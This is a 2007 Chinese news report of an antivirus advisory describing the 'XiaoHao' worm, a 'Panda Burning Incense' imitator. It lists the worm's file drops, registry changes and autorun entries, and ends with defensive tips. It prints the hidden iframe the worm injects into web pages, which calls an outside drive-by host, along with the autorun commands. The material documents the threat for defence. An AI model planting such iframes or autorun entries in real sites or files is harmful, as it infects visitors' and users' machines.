“小浩”模仿“熊猫烧香”疯狂作案

来源：作者：出处：巧巧读书 2007-08-15 进入讨论组

　　据江民反病毒中心报道江民反病毒中心监测到，目前有一新蠕虫病毒“小浩”（Worm/XiaoHao.a）正在互联网上悄悄作案，该病毒与“熊猫烧香”蠕虫病毒极为相似，可以感染*.exe可执行程序，并将所以被感染的可执行文件图标变为一个“浩”字。
病毒同时还会感染各种网页脚本程序，将正常网页插入带毒网址，并且可以通过U盘进行传播。值得注意的是该病毒的破坏能力甚至超过了“熊猫烧香”，被感染后的*.exe文件将遭到破坏，并且无法恢复。

　　江民反病毒专家介绍，“小浩”蠕虫病毒（Worm/XiaoHao.a）感染.exe可执行程序时，用病毒程序覆盖被感染程序，属于覆盖式写入，破坏式感染，因此被感染的文件即使是专业的数据恢复公司也无法完全恢复。从这种意义上来看，“小浩”病毒的破坏力远胜于“熊猫烧香”。
　　针对此病毒，江民科技已经紧急升级了病毒库，用户只要升级到8月14日的病毒库，就可以有效地拦截此病毒的入侵。

　　“小浩”病毒发作图如下：

　　病毒行为：

　　1、当病毒体在被感染的系统上激活后，会在磁盘跟目录释放autorun.inf等文件，感染U盘等移动设备：
　　%DRIVE%autorun.inf 文件属性：H
　　%DRIVE%Xiaohao.exe 文件属性：H

　　2、同时在跟目录释放一个名为Jilu.txt文件，记录了相关感染文件列表。

　　3、拷贝自身到系统目录下，全路径： %SystemRoot%system32exloroe.exe

　　4、将自动加入到注册表启动项确保自身启动激活：
　　键路径：HKEY_LOCAL_MACHINESOFTWAREMicrosoftActive SetupInstalled Components
　　键名：{H9I12RB03-AB-B70-7-11d2-9CBD-0O00FS7AH6-9E2121BHJLK}
　　键值：%SystemRoot%system32exloroe.exe

　　5、将系统时间修改为2005年1月17日，会导致部分杀毒软件和其他正版软件因授权问题无法激活。
　
　　6、全盘搜索扩展名为*.jsp、*.php、 *.aspx、 *.asp、 *.html、 *.htm的文件，向其中插入病毒网址。
　　＜IFRAME src="http://xiaohao.yona.biz/*.htm" width=0 height=0>＜/IFRAME>
　　其中该恶意页面利用多个系统漏洞针对Windows 2000/XP/2003进行有针对性的挂马。

　　7、其它行为：修改注册表使系统无法正常浏览隐藏文件，修改注册表劫持正常的EXE运行，使得运行一些文件会先运行蠕虫自身：
　　HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionExplorerAdvancedFolderHiddenSHOWAL
　　shellAutocommand=Xiaohao.exe
　　shellexecute=Xiaohao.exe
　　open=Xiaohao.exe
　　当用户打开感染的文件夹时，资源管理器标题会被修改成：已中毒 X14o-H4o's Virus

　　同时江民反病毒专家建议广大用户：
　　1. 安装KV2007的杀毒软件，开启每天定时升级病毒库，定时杀毒功能，并开启所有的监控功能。
　　2. 禁用系统的自动播放功能，防止病毒从U盘、移动硬盘、MP3等移动存储设备进入到计算机。
　　禁用Windows 系统的自动播放功能的方法：在运行中输入 gpedit.msc 后回车，打开组策略编辑器，依次点击：计算机配置－＞管理模板－＞系统－＞关闭自动播放－＞已启用－＞所有驱动器－＞确定。
　　3. 利用Windows Update 功能打全系统补丁，避免病毒从网页木马的方式入侵到系统中。

巧巧读书:http://www.qqread.com/news/f326141.html